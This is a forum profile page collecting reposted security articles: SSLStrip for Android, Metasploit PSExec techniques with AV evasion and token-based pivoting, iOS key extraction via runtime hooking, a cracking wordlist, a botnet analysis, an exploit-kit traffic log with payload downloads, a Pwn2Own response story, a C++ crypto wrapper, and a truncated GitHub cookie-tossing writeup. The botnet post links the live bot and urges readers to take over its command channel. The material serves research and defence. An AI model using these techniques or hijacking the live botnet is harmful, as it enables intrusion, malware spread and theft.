Jump to content

Nytro

Administrators
  • Posts

    18748
  • Joined

  • Last visited

  • Days Won

    719

Everything posted by Nytro

  1. SSLStrip-for-Android SSLStrip for Android This project is port of SSLStrip(https://github.com/moxie0/sslstrip), plus NanoHTTPD and Arpspoof for Andorid libraries. How to build: 1). Go to libs folder, run ndk-build, copy arpspoof to res/raw/arpspoof 2). Compile this eclipse project as usual! PS: For research purposes only. Please do not abuse this software. Sursa: https://github.com/crazyricky/SSLStrip-for-Android
  2. [h=1]PSExec Demystified [/h]Posted by thelightcosine in Metasploit on Mar 9, 2013 10:28:33 AM Multiple modules inside the Metasploit Framework bear the title PSExec, which may be confusing to some users. When someone simply refers to “the PSExec module”, they typically mean exploit/windows/smb/psexec, the original PSExec module. Other modules are more recent additions, and make use of the PSExec technique in other ways. Here’s a quick overview of what these modules are for: [TABLE=width: 437] [TR] [TD]Metasploit Module [/TD] [TD=width: 118]Purpose [/TD] [TD=width: 149]Comment [/TD] [/TR] [TR] [TD=width: 171]exploit/windows/smb/psexec [/TD] [TD=width: 118]Evading anti-virus detection [/TD] [TD=width: 149]Service EXE is now getting caught by most AV vendors. Use custom templates or MOF upload method to circumvent AV detection. [/TD] [/TR] [TR] [TD=width: 171]exploit/windows/local/current_user_psexec [/TD] [TD=width: 118]Local exploit for local administrator machine with goal to obtain session on domain controller [/TD] [TD=width: 149]Great starting point to take over an entire network. Attack is less likely to get noticed because it uses legitimate access methods. [/TD] [/TR] [TR] [TD=width: 171]auxiliary/admin/smb/psexec_command [/TD] [TD=width: 118]Run arbitrary commands on the target without uploading payloads. [/TD] [TD=width: 149]Unlikely to be detected by AV but limited because you can only send one command, not obtain a session. [/TD] [/TR] [TR] [TD=width: 171]auxiliary/scanner/smb/psexec_loggedin_users [/TD] [TD=width: 118]Get list of currently logged in users [/TD] [TD=width: 149]Run this module against all targets to get tons of information on your targets. [/TD] [/TR] [/TABLE] We’ll now look at each one in detail below. First, let’s talk about what PSExec is, and where the idea comes from. [h=2]The PSExec Utility[/h] The name PSExec comes from a program by the same name. Mark Russinovich wrote this utility as part of his sysInternals suite in the late 90s to help Windows Administrators perform important tasks, for example to execute commands or run executables on remote systems. The PSExec utility requires a few things on the remote system: the Server Message Block (SMB) service must be available and reachable (e.g. not blocked by firewall); File and Print Sharing must be enabled; and Simple File Sharing must be disabled. The Admin$ share must be available and accessible. It is a hidden SMB share that maps to the Windows directory is intended for software deployments. The credentials supplied to the PSExec utility must have permissions to access the Admin$ share. PSExec has a Windows Service image inside of its executable. It takes this service and deploys it to the Admin$ share on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. It turns on the PSExec service on the remote machine. The PSExec service then creates a named pipe that can be used to send commands to the system. [h=2]The PSExec Exploit (exploit/windows/smb/psexec)[/h] The PSExec exploit modules in Metasploit runs on the same basic principle as the PSExec utility. It can behave in several ways, many of them unknown to most users. [h=3]The Service EXE[/h] In this method, the exploit generates and embeds a payload into an executable, which is a Service image uploaded by the PSExec utility – similar to the PSExec service. The exploit then uploads the service executable to the Admin$ share using the supplied credentials, connects to the DCE/RPC interface, and calls into the Service Control Manager before telling SCM to start the service that we deployed to Admin$ earlier. When the service is started, it starts a new rundll32.exe process, allocates executable memory inside that process and copies the shellcode into it. It then calls the starting address of that memory location as if it were a function pointer, executing the stored shellcode. The service EXE is generated using an executable template with a placeholder where the shellcode is inserted. The default executable templates in Metasploit Framework are flagged by major AV solutions because most anti-virus vendors have signatures for detecting these templates. No matter what payload you stick in this executable template, it will get flagged by AV. [h=4]AV Evasion[/h]The PSExec exploit has several advanced options. The first is the options to supply alternative executable templates. There are two separate options: One is to use set EXE::Path, which will tell Metasploit to look in a different directory for the executable templates. The other is set EXE::Template, which is the name of the executable template file to use. If you create an executable template and store it in a different directory, you will need to set both of these options. Writing a custom executable template is a good way to avoid AV detection. If you write your own EXE template for the PSExec exploit, it must be a Windows service image. In addition to writing a custom executable template, you can write an entire executable on your own. This means that a Metasploit payload will not actually get inserted. You will code the entire behavior into the EXE itself. The psexec exploit module will then upload the EXE and try to start it via SCM. Tip: If you would like to save time evading anti-virus, you can use the dynamic executable option in Metasploit Pro, which generates random executable files each time that are much less likely to be detected by anti-virus. (Watch my webcast Evading Anti-virus Detection with Metasploit for more info.) [h=3]The Management Object File (MOF) upload method[/h] MOF files are a part of the Windows Management Instrumentation (WMI). They are Manage Object Files. They contain WMI information and instructions. MOF files must be compiled to work properly, however there is a way around that on Windows XP. In Windows XP, if you drop an uncompiled MOF file in the system32\wbem\mof\ directory, Windows XP will compile the MOF for you and run it. The PSExec exploit has a method for using this to our advantage. If you set MOF_UPLOAD_METHOD true, it will do a few things differently. Our payload EXE will be generated as a normal instead of a service EXE. It will then upload it via Admin$ as expected before generating a MOF file that will execute the EXE we uploaded. It will use Admin$ to deploy the MOF file to the MOF directory. Windows XP will then compile and run the MOF, causing our payload EXE to be executed. The MOF method can be combined with the custom EXE or custom template methods described above to try and evade AV as well. The MOF Method currently only works on Windows XP as later versions require the MOF to already be compiled in order for them to run. [h=2]The PSExec Current User Local Exploit(exploit/windows/local/current_user_psexec)[/h] The Current User PSExec module is a local exploit. This means it is an exploit run on an already established session. Let’s set up a scenario to explain how this works. In our scenario you do the following: Set up a browser exploit at some address Trick a local system administrator to visiting the site Get a reverse Meterpreter shell, inside the administrator’s browser process Run netstat to see if the administrator is connected to one of the Domain controllers So now Meterpreter is running on a system administrator’s box under her user context. While there may not be something you’re interested in on her workstation, she has permission to access a domain controller (DC), which you would like to shell. You don’t have her credentials, and you cannot talk directly to the DC from your box. This is where the current_user_psexec module comes in. This local exploit works the same way as the psexec exploit. However, it runs from the victim machine. You also do not supply any credentials. This exploit takes the authentication token from the user context, and passes that alone. This means you can get a shell on any box the user can connect to from that machine and has permissions on, without actually knowing what their credentials are. This is an invaluable technique to have in your toolbox. From that first machine you can compromise numerous other machines. You can do this without having set up any proxy or VPN pivots, and you will have done it using legitimate means of access. [h=2]The PSExec Command Execution Module (auxiliary/admin/smb/psexec_command)[/h] Submitted by community contributor Royce @R3dy__ Davis, this module expands upon the usefulness of the PSExec behavior. It utilizes the same basic technique but does not upload any binaries. Instead it issues a single Windows command to the system. This command is then run by the remote system. This allows arbitrary commands to be executed on the remote system without sending any payloads that could be detected by AV. While it does not get you a shell, it will allow you to perform specific one off actions on the system that you may need. [h=2]The PSExec Logged In Users Module (auxiliary/scanner/smb/psexec_loggedin_users)[/h] Also brought to you by Royce @R3dy__ Davis, this module is a specialized version of the command execution one. It uses the same technique to specifically query the registry on the remote machine and get a list of all currently logged on users. It is a scanner module which means it can also run against numerous hosts simultaneously, quickly getting the information from all the targeted hosts. [h=2]Summary[/h] What we’ve seen here is that the PSExec technique is actually a relatively simple mechanism with immense benefit. We should all remember to thank Mark Russinovich for this wonderful gift he has given us. As time goes by, people will find many more uses for this same technique, and there is room for improvement on how these modules work and interact. The PSExec exploits are two of the most useful, and most reliable, techniques for getting shells in the entire Metasploit Framework. Sursa: https://community.rapid7.com/community/metasploit/blog/2013/03/09/psexec-demystified
  3. Retrieving Crypto Keys via iOS Runtime Hooking Tuesday, March 5, 2013 at 8:45AM I am going to walk you through a testing technique that can be used at runtime to uncover security flaws in an iOS application when source code is not available, and without having to dive too deeply into assembly. I am going to use a recent example of an iOS application I reviewed, which performed its own encryption when storing data onto the device. These types of applications are a lot of fun to look at due to the variety of insecure ways people implement their own crypto. In this example the application required authentication, and then pulled down some data and stored it encrypted on the device for caching. The data was presented to the user where they could “act” upon it. Sounds pretty generic, but hopefully the scenario is familiar enough to those who assess mobile apps. Upon analyzing the application traffic, it was obvious that no crypto keys were being returned from the server. After sweeping the iOS Keychain and the entire Application container, I could make the educated assumption that the key is either a hardcoded value or derived using device specific information. Using the Hopper Disassembler (Available on the Mac App Store), I was able to see that the application was leveraging the Common Crypto library for its encryption. I checked the cross-references for calls to the CCCryptorCreate function in order find the code areas which perform encryption. The following screenshot shows getSymmetricKeyBytes being called right before the CCCryptorCreate function. I felt pretty confident that the purpose of the getSymmetricKeyBytes method was going to be to return the symmetric key used for encryption. I decided to create a Mobile Substrate tweak in order to hook into getSymmetricKeyBytes and read the return value. I used the class-dump-z tool to get a listing of all the exposed Objective-C interfaces. From here it is easy to get more detailed information about the method, such as the class name, return type and any required parameters. The following is a short snippet retrieved from the class-dump-z results. @interface SecKeyWrapper : XXUnknownSuperclass { NSData* publicTag; NSData* privateTag; NSData* symmetricTag; unsigned typeOfSymmetricOpts; SecKey* publicKeyRef; SecKey* privateKeyRef; NSData* symmetricKeyRef; } [..snip..] -(id)getSymmetricKeyBytes; -(id)doCipher:(id)cipher key:(id)key context:(unsigned)context padding:(unsigned*)padding; [..snip..] We can quickly create a tweak by using the Theos framework. The tweak in this case looked as follows: %hook SecKeyWrapper - (id)getSymmetricKeyBytes { NSLog(@”HOOKED getSymmetricKey”); id theKey = %orig; NSLog(@”KEY: %@”, theKey); return theKey; } %end %ctor { NSLog(@”SecKeyWrapper is created.”); %init; } It doesn’t do much more then read the return value of the original method call and write it out to the console. It was possible to confirm that a static key was being used by running the tweak on another iPad, and observing that the same symmetric key was returned. The next step was to decrypt the files. We could hook into the doCipher:key:context:padding method and just print out the first parameter to get the plaintext data. That would work, but that wouldn’t be reproducible since the Tweak code would only execute when the doCipher:key:context:padding method is actually run by the application. A quick Google search on the SecWrapper class turned up the following sample code from Apple. Sursa: GDS Blog - GDS Blog - Retrieving Crypto Keys via iOS Runtime Hooking
  4. [h=1]A BIG password cracking wordlist[/h] Defuse Security have released the word-list used by their Crackstation project It really is something.. The numbers? 4.2 GiB compressed. 15 GiB uncompressed. 1,493,677,782 words It’s a mix of every wordlist, dictionary, and password database leak every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages) as well as lots of books from Project Gutenberg also includes the passwords from some low-profile database breaches that were being sold in the underground years ago I was in the process of doing this also for my own stuff, mixing all of the password database leaks along pr0n password dumbs, so yeah these guys saved me a lot of work I don’t really know how this wordlist compares to UNIQPASS v11 but, that’s something for someone else to find out Now.. on to hashcat for some tests P.S: A guide on using hashcat will follow sometime in the near future ;p Torrent Download: Download A BIG password cracking wordlist Torrent | 1337x.org Sursa: A BIG password cracking wordlist | 57un
  5. [h=1]Reversing a Botnet[/h] Howdy fellow crackers and hackers alike! Have I got a treat for you? A live botnet. The other day at work, I encountered a number of machines all attacking other hosts. Normally its just one machine, but this there were several. We isolated the exe responsible because it was eating up 100% CPU (not exactly subtle). I was curious about what made it tick, so I disassembled it and this is what I found. Normally where I work, we’re hit by botnets, and never get to catch them in the act as tracking down the mothership is difficult. First things first, I want to know more about the executable, like if its packed, or what have you. As the picture shows, the executable is NOT packed, rather just your standard run of the mill PE (portable executable) file. The 2 extra sectioned highlighted tell is the type of compiler used – GCC for windows aka mingw, meaning either CodeBlocks was used or Devcpp. I say this because the .bss and .idata sections are specific to GCC and remind me of ELF (executable linker format) used by Linux. Since I don’t want to join said botnet, I’m sticking to static analysis. Opening the thing up in IDA, we find exactly what kind of malware we’re dealing with – amaturish. The strings are not encoded, nor are they hidden. The first thing I noticed was the IP address. For those curious, a quick search on ARIN reveals the IP address as belonging to some collocation service in Atlanta: http://whois.arin.net/rest/net/NET-199-229-248-0-1/pft The next thing we see is the channel name #test(more on that in a sec), then the passwords. The ‘Operation Dildos’ name deduces that our malware writers are either 14, or immature. I still chuckled though. The next thing I determined was the type of bot we were dealing with. Scrolling further through revealed IRC instructions. You’ve read RF C1459 right? IRCHelp.org — Untitled Page JOIN, PING, PONG, NICK, PRIVMSG – these are all IRC commands. Further inspection of the bot revealed the commands the that can be issued to the bot by its master. The commands are ‘help’ – derp. ‘version’ – derrrr. ‘speedtest’ – perform a speed test by performing web request to 68.11.12.242 which traced this to Louisiana. I have a feeling our malware writer lives in that area because of the botnet server resides in Georgia. Just a guess ‘exec’ – Execute a command. ‘dle’ – Download and execute a file. ‘udp’ – Do a udp flood. ‘openurl’ – Open a hidden window of a URL. ‘syn’ – Do s syn flood. ‘stop’ – Stops execution. If you’re curious how the bot performs the lookup on the command, here it is. What you can’t see is the stub at the top which belongs to the subroutine responsible for the IRC connection to the server. Next thing I found scrolling through was the error handler data section – messages sent to alert the master that said command completed. The last thing in this reversing session I’d like to point out is just before the command listing – the password check. The assembly instruction ‘repne scasb’ is a string operation. It means scan string for NULL decrementing the ecx (extended counter register) for each char. I see it primarily with string comparison operations. Enough about the bot itself, lets learn more about the botnet. A quick ping shows us its still online. You may also notice Connecting to it seems to work, so its still operational. The botnet itself seems to be growing because when I looked last night, there were only 400 hosts. Checking now, I see ‘There are 3 users and 1131 invisible on 2 servers’ When i connected, I was called out by the server admin within minutes whom I saw the first time I connected. Since I don’t want to throw rocks at a hornest’s nest (get my server DDOS’d off the net), I decided not to further pursue. My readers on the other hand, go nuts. You have the password to issue commands, you have the irc server address, you have the channel where the bots reside (#test). Perhaps I may try again tonight at like 1 am when the admins are probably asleep. Until then, keep on cracking. For those of you who are curious, you can download the bot here, complete with IDA 6 compatible db file: The Bot. Sursa: Reversing a Botnet
  6. [h=1]CVE-2013-1493 (jre17u15 - jre16u41) in Cool EK[/h]That was fast (4 days after patch). After CVE-2013-0634 (flash), it's now CVE-2013-1493 (last know vulnerability up to jre17u15 - jre16u41) that reach Cool Exploit Kit (from Reveton distributor - btw this ransomware seems to be clothed again with what i called the Winter II design) Credits first : Will Metcalf from Emerging Threats for the "path" part of the landing. Michael Shierl for confirming (and giving more clues) that it looks like CVE-2013-1493. Chris Wakelin for additional tips I will update here integration in other exploit kits (would be surprising if it does not happen..and will modify title) Cool EK : jre17u15: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]CVE-2013-1493 successful path in Cool EK (jre17u15) 2013-03-08[/TD] [/TR] [/TABLE] jre16u41: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]CVE-2013-1493 successfull path in Cool EK (jre16u41) 2013-03-08[/TD] [/TR] [/TABLE] GET http://retrempercircum[...].glamorizesports.com/world/bright_rural_mutter.html 200 OK (text/html) GET http://retrempercircum[...].glamorizesports.com/world/rug-magistrate.jar 200 OK (application/java-archive) a3410c876ed4bb477c153b19eb396f42 GET http://retrempercircum[...].glamorizesports.com/world/improved_violently_section.swf 404 Not Found (text/html) GET http://[...]/world/getnn.jpg 200 OK (application/x-msdownload) e343845066df8c271b5ac095f2d44183 Out of scope Reveton Note : if you get infected with java 1.7u > 10 , don't try to say you were not warned ! [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Security in jre17u>10 Want to get infected ? follow the bubble[/TD] [/TR] [/TABLE] For java 1.6...things are differents [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=class: tr-caption, align: center]In jre16 (no comment)[/TD] [/TR] [/TABLE] Files: a3410c876ed4bb477c153b19eb396f42 (nothing more for now) Reading : YAJ0: Yet Another Java Zero-Day - 2013-02-28 - Darien Kindlund and Yichong Lin - FireEye Blog CVE-2013-1493 - Mittre Latest Java Zero-Day Shares Connections with Bit9 Security Incident - 2013-03-01 - Symantec Posted 21 hours ago by Kafeine Sursa: Malware don't need Coffee: CVE-2013-1493 (jre17u15 - jre16u41) in Cool EK
  7. [h=1]Protecting Mozilla Firefox users on the web[/h] I have followed Pwn2Own ever since its inception in 2007. For those of you who do not know what Pwn2Own is, it is a competition in which hackers try to take advantage of software weaknesses in browsers (Internet Explorer, Firefox, Chrome, Safari etc.), put up specially crafted webpages and click on them to try and launch another application, usually calc.exe. They then gain a monetary reward in return. It usually happens on the sidelines of CanSecWest, a yearly security conference held in Vancouver. During my university days in Singapore on the other side of the world, I always followed this competition with anticipation. I told myself, one day, just one day, I will be at the frontline helping to decipher the problem and help to get the fix out to Firefox users around the world as soon as possible. Over the years, a security researcher by the name of Nils took down Firefox in 2009 (bug 484320) and in 2010 (bug 555109), whereas in 2011, nobody took down Firefox. Last year in 2012, I was on-site in Vancouver and I witnessed Willem Pinckaers and Vincenzo Iozzo take down Firefox. However, the bug (720079) was already identified and fixed through internal processes. This year, Pwn2Own became the venue for many exploits against major browsers, including Firefox (bug 848644), as well as other plugins which are more often used in browsers, such as Flash and Java. The team that took down Firefox this year was VUPEN Security, who also punched holes through Internet Explorer 10, Java and Flash. Some of my colleagues / co-workers were present at the conference and were relaying us information live, while I stayed back at the office preparing my machines to diagnose the issue. === The following timeline (all times PST) describes my role behind the scenes with respect to the Firefox exploit by VUPEN, on March 6, 2013: ~3pm: Rumblings heard on IRC channels that Firefox has been moved from its scheduled slot to 5.30pm. 5.30pm: VUPEN gets ready. ~5.54pm: VUPEN takes down Firefox. On-site team gets to work getting details of the exploit. ~7pm: Bug 848644 gets filed. Looking at the innings of the testcase, together with confirmation with team members over IRC that there is no malicious code present (Proof of Concept (PoC) code just crashes), I manage to reproduce the crash on a fully-patched Windows 7 system. More analysis from early responders flow in; information such as the attack vector (Editor), Asan stack trace showing the implicated functions (possibly nsHTMLEditRules::GetPromotedPoint). I did a quick stab at the regression range here. Using the bisection technique described here, I found that early January 2012 builds did not crash, whereas early January 2013 builds did crash. The testcase seemed initially tricky; until it was eventually found (quite awhile later) that one could reliably trigger this with one tab that somehow caused the “pop-up blocked” info bar to show, I had to try the testcase repeatedly, sometimes reloading, sometimes closing then opening the browser again to trigger the crash. Using mozregression here might have been a good idea – however due to an incorrect decision whether a particular build was crashing or not, one would bisect down to an incorrect regression window and waste precious time. Time was of the essence here – the sooner one gets an accurate regression window, the faster a developer can potentially pinpoint the cause of the crash. I found myself repeatedly downloading and checking builds to see if they did crash or not. Sometimes the crash happened immediately on load (with the initial PoC). Other times it happened only after a few minutes, or only after a restart. I eventually settled on the following regression window: crash happens on the October 6, 2012 nightly, but not on the previous day’s (October 5), and I posted a comment, so this could get confirmation from other people. I then immediately looked through the hgweb regression window to see if anything stood out – bug 796839 seemed like a likely cause, but everything else was still a possibility. in that regression window, more clues emerge. The Asan stack trace pointed to nsHTMLEditRules::GetPromotedPoint being part of the bigger picture here, and some detective work showed that in this changeset from bug 796839, the file editor/libeditor/html/nsHTMLEditRules.cpp was changed, and this was the file that nsHTMLEditRules::GetPromotedPoint was located in. Coincidence? Probably. However, this made everything more likely. At this point in time, it was 8pm, approximately one hour from the point in which the testcase was obtained. I began to consider (and possibly discount) other possibilities, including bug 795610. Thanks to great work by Nicolas Pierron and his git wizardry, we found that nsHTMLInputElement::SetValueInternal (also implicated in the Asan stack trace), existed in nsHTMLInputElement.cpp which was modified in that bug. However, this possibility was quickly discounted. At this point, I was able to get independent verification that the regression window (Oct 5 – Oct 6) was indeed correct. Further checking showed that our Extended Support Releases (ESR) builds on version 17 was also affected. This made bug 796839 extremely likely to be the root cause, because it was landed on mozilla-central during the version 18 nightly window, but was backported to mozilla-aurora at that time, which was the version 17 branch. Bug 796839 would encompass the patch landing that inadvertently opened up a vulnerability in Firefox. Independent confirmation of this regressor came at 9pm. Within 2 hours, we had gotten from having a PoC testcase with no idea what was affected, to knowing which patch caused the issue. I thus nominated for the fix to be landed on all affected branches. By about 10pm, the fix was put up for review. After that, lots of great work by various people/teams went towards quick approvals, landing of the fix, along with QA verification. Overnight, builds were created and by late morning the next day, the advisory was prepared, with QA about to sign-off on the new builds. At 4pm, a new version of Firefox (19.0.2) was shipped with the fix. === Credit must be given to the other Mozilla folks in this effort, who have, outside of normal day working hours, worked till late night to make this possible. I am proud to be part of this fabulous team effort. It certainly has been my honour to have helped keep Mozilla users safe on the web. Sursa: Protecting Mozilla Firefox users on the web | It's a Wonderful Life
  8. [h=1]Cryptographic Primitives in C++[/h] This page walks through the implementation of an easy-to-use C++ wrapper over the OpenSSL crypto library. The idea is to go through the OpenSSL documentation once, make the right choices from a cryptographic point of view, and then, hide all the complexity behind a reusable header. The following primitives are typically used in the applications I write: Random Number Generation Password Based Symmetric Key Generation (PBKDF2/HMAC-SHA-256) Message Digests and Authentication Codes (SHA-256 & HMAC-SHA-256) Authenticated Encryption with Associated Data (AES-128-GCM) The wrapper is a single header file that can be included wherever these primitives are needed. It includes OpenSSL and Boost headers and will require linking with the OpenSSL object libraries. Here is a sample and here are the tests. [h=4]Data Buffers[/h] Most of the wrapper functions work on blocks of data and we need a way to pass these in and out of the wrapper routines. Any C++ container that guarantees contiguous storage (i.e. std::vector, std::string, std::array, boost::array or a raw char array) can be passed as the argument to any wrapper function that takes a data buffer as a parameter. Having said that, it is best to avoid using dynamic STL containers for storing sensitive data because it is diffcult to scrub them off once we're done using the secrets. The implementations of these containers are allowed to reallocate and copy their contents in the memory and may end up with inaccessible copies of sensitive data that we can't overwrite. Simpler containers like boost::array or raw char arrays are better for this purpose. You can also use the following typedef: namespace ajd { namespace crypto { /// A convenience typedef for a 128 bit block. typedef boost::array<unsigned char, 16> block; /// Remove sensitive data from the buffer template<typename C> void cleanse(C &c) The wrapper also provides a cleanse method that can be used to overwrite secret data in the buffers. This method does not deallocate any memory, it only overwrites the contents of the passed buffer by invoking OPENSSL_cleanse on it. [h=4]Secure Random Number Generation[/h] OpenSSL provides a simple interface around the underlying operating system PRNG. This is exposed by the wrapper using the following two functions: /// Checks if the PRNG is sufficiently seeded bool prng_ok(); /// Fills the passed container with random bytes. template<typename C> void fill_random(C &c); prng_ok checks if the PRNG has been seeded sufficiently and fill_random routine fills any mutable container with random bytes. In the exceptional situation that prng_ok returns false you must use use the OpenSSL seed routines RAND_seed and RAND_add directly to add entropy to the underlying PRNG. Here's how you can use them: void random_generation() { assert(crypto::prng_ok()); // check PRNG state crypto::block buffer; // use the convenience typedef crypto::fill_random(buffer); // fill it with random bytes unsigned char arr[1024]; // use a static POD array crypto::fill_random(arr); // fill it with random bytes std::vector<unsigned char> vec(16); // use a std::vector crypto::fill_random(vec); // fill it with random bytes } [h=4]Password Based Symmetric Key Generation[/h] Symmetric ciphers require secure keys and one way to generate them is using the fill_random routine seen above. More commonly however, we'd want to derive the key bits from a user provided password. The standard way to do this is using the PBKDF2 algorithm which derives the key bits by iterating over a pseudo random function with the password and a salt as inputs. The wrapper sets HMAC-SHA-256 as the chosen pseudo random function and uses a default iteration count of 10000. /// Derive a key using PBKDF2-HMAC-SHA-256 template <typename C1, typename C2, typename C3> void derive_key(C3 &key, const C1 &passwd, const C2 &salt, int c = 10000) The salt can be any public value that will be persisted between application runs. Repeated invocations of this key derivation routine with the same password and salt value produce the same key bits. This saves us from the hassle of securely storing the secret key assuming that the application can interact with a human user and prompt for the password. Here's a sample invocation of the key derivation routine: void key_generation() { crypto::block key; // 128 bit key crypto::block salt; // 128 bit salt crypto::fill_random(salt); // random salt crypto::derive_key(key, "password", salt); // password derived key crypto::cleanse(key) // clear sensitive data } [h=4]Message Digests and Message Authentication Codes[/h] Cryptographic hashes are compression functions that digest an arbitrary sized message into a small fingerprint that uniquely represents it. Although they are the building blocks for implementing integrity checks, a hash, by itself, cannot guarantee integrity. An adversary capable of modifying the message is also capable of recomputing the hash of the modified message to send along. For an additional guarantee on the origin we need a stronger primitive which is the message authentication code (MAC). A MAC is a keyed-hash, i.e. a hash that can only be generated by those who posses an assumed shared key. The assumption of secrecy of the key limits the possible origins and thus provides us the guarantee that an adversary couldn't have generated it. MD5 should not be used and SHA-1 hashes are considered weak and unsuitable for all new applications. The wrapper uses SHA-256 for generating plain digests and HMAC with SHA-256 for MACs. /// Generates a keyed or a plain cryptographic hash. class hash: boost::noncopyable { public: /// A convenience typedef for a 256 SHA-256 value. typedef boost::array<unsigned char, 32> value; /// The plain hash constructor (for message digests). hash(); /// The keyed hash constructor (for MACs) template<typename C> hash(const C &key); /// Include the contents of the passed container for hashing. template <typename C> hash &update(const C &data); /// Get the resultant hash value. template<typename C> void finalize(C &sha); /// ... details ... }; The default constructor of the class initializes the instance for message digests. The other constructor takes a key as input and initializes the instance for message authentication codes. Once initialized, the data to be hashed can be added by invoking the update method (multiple times, if required). The resulting hash or MAC is a SHA-256 hash (a 256 bit value) that can be extracted using the finalize method. The shorthand typedef hash::value can be used to hold the result. The finalize method also reinitializes the underlying hash context and resets the instance for a fresh hash computation. Here's how you can use the class: void message_digest() { crypto::hash md; // the hash object crypto::hash::value sha; // the hash value md.update("hello world!"); // add data md.update("see you world!"); // add more data md.finalize(sha); // get digest value } void message_authentication_code() { crypto::block key; // the hash key crypto::fill_random(key); // random key will do (for now) crypto::hash h(key); // the keyed-hash object crypto::hash::value mac; // the mac value h.update("hello world!"); // add data h.update("see you world!"); // more data h.finalize(mac); // get the MAC code crypto::cleanse(key) // clean senstive data } [h=4]Authenticated Encryption with Associated Data[/h] Encryption guarantees confidentiality and authenticated encryption extends that guarantee to guard against tampering of encrypted data. Operation modes like CBC or CTR cannot detect modifications to the ciphertext and decrypt tweaked data as they would decrypt any other ciphertext. An adversary can use this fact to make calibrated modifications to the ciphertext and end up with the desired plaintext in the decrypted data. The recommended way to guard against such attacks is to use an authenticated encryption mode like the Galois Counter Mode (GCM). Authenticated encryption schemes differ from the simpler schemes in that they produce an extra output along with the cipher text. This extra output is an authentication tag that is required as an input at the time of decryption where it is used to detect modifications in the ciphertext. Another feature of authenticated encryption is their support for associated data. Network protocol messages include data (ex: header fields in packets) that doesn't need to be encrypted but must be guarded against modifications in transit. Authenticated encryption schemes allow the addition of such data into the tag computation. So while the adversary can view this data in transit, it cannot be modified without the decryption routine noticing it. The following class provides authenticated encryption with associated data: /// Provides authenticated encryption (AES-128-GCM) class cipher : boost::noncopyable { public: /// Encryption mode constructor. template<typename K, typename I> cipher(const K &key, const I &iv); /// Decryption mode constructor. template<typename K, typename I, typename S> cipher(const K &key, const I &iv, S &seal); /// The cipher transformation. template<typename I, typename O> cipher &transform(const I &input, O &output); /// Adds associated authenticated data. template<typename A> cipher &associate_data(const A &aad); /// The encryption finalization routine. template<typename S> void seal(S &seal); /// The decryption finalization routine (throws if the ciphertext is corrupt) void verify(); /// ... details ... }; The crypto::cipher class has two constructors. The 2 argument variant takes a key and an initialization vector (128 bits each) and initializes the instance for encryption. Plaintext can be transformed into ciphertext using the transform method. The GCM mode does not use any padding so the output ciphertext buffer must be as big as the input plaintext buffer. If there's any associated data that needs to be sent along with the ciphertext it can be added using the associate_data method. Note that the OpenSSL implementation of GCM requires that associated data is added before the plaintext is added (i.e. all calls to associate_data must precede all calls to transform.) Once all the data has been added, the seal method must be invoked to obtain the authentication tag (128 bits) and it must be sent along with the ciphertext. The 3 argument constructor takes a key, an IV and the encryption seal as inputs and initializes the instance for decryption. Ciphertext can then be transformed to plaintext using the transform method (after adding any associated data using the associate_data method). Before using the plaintext, the verify method must be invoked to detect any tampering in the ciphertext or associated data. If all is well the method silently returns, however if the seal does not match the expected tag value, an exception is raised and the decrypted plaintext must be rejected. The following sample shows the usage: void authenticated_encrypt_decrypt() { crypto::block iv; // initialization vector crypto::block key; // encryption key crypto::block seal; // container for the seal crypto::fill_random(iv); // random initialization vector crypto::fill_random(key); // random key will do (for now) unsigned char date[] = {14, 1, 13}; // associated data std::string text("can you keep a secret?"); // message (plain-text) std::vector<unsigned char> ciphertext(text.size()); { crypto::cipher cipher(key, iv); // initialize cipher (encrypt mode) cipher.associate_data(date); // add associated data first cipher.transform(text, ciphertext); // do transform (i.e. encrypt) cipher.seal(seal); // get the encryption seal } std::vector<unsigned char> decrypted(ciphertext.size()); { crypto::cipher cipher(key, iv, seal); // initialize cipher (decrypt mode) cipher.associate_data(date); // add associated data first cipher.transform(ciphertext, decrypted); // do transform (i.e. decrypt) cipher.verify(); // check the seal } crypto::cleanse(key) // clear senstive data That completes the list of primitives we started off with. There's more to be done, in particular, some for primitives that use public key cryptography, but I'll leave that for some other day. © 2013 Aldrin D'Souza Sursa: Cryptographic Primitives in C++
  9. [h=3]Hacking Github with Webkit[/h]Personal: EgorHomakov.com, Consulting: Sakurity [h=2]Friday, March 8, 2013[/h]Previously on Github: XSS, CSRF (My github followers are real, I gained followers using CSRF on bitbucket), access bypass, mass assignments (2 Issues Reported forever), JSONP leaking, open redirect..... TL;DR: Github is vulnerable to cookie tossing. We can fixate _csrf_token value using a Webkit bug and then execute any authorized requests. Github Pages Plain HTML pages can served from yourhandle.github.com. These HTML pages may contain Javascript code. Wait. Custom JS on your subdomains is a bad idea: If you have document.domain='site.com' anywhere on the main domain, for example xd_receiver, then you can be easily XSSed from a subdomain Surprise, Javascript code can set cookies for the whole *.site.com zone, including the main website. [h=2]Webkit & cookies order[/h] Our browsers send cookies this way: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED; Please have in mind that Original _gh_sess and Dropped _gh_sess are two completely different cookies! They only share same name. Also there is no way to figure out which one is Domain=github.com and which is Domain=.github.com. Rack (a common interface for ruby web applications) uses the first one: cookies.each { |k,v| hash[k] = Array === v ? v.first : v } Here's another thing, Webkit (Chrome, Safari, and the new guy, Opera) sends cookies ordering them not by Domain (Domain=github.com must go first), and even not by httpOnly (they should go first obviously). It orders them by the creation time (I might be wrong here, but this is how it looks like). First of all let's have a look at the HACKED cookie. PROTIP — save it as decoder.rb and decode sessions faster: require'uri' require'base64' p Marshal.load(Base64.decode64(URI.decode(gets.split('--').first))) ruby decoder.rb BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b {:session_id=>"5a78a4fa3d808ba417e9cf29f255884d", 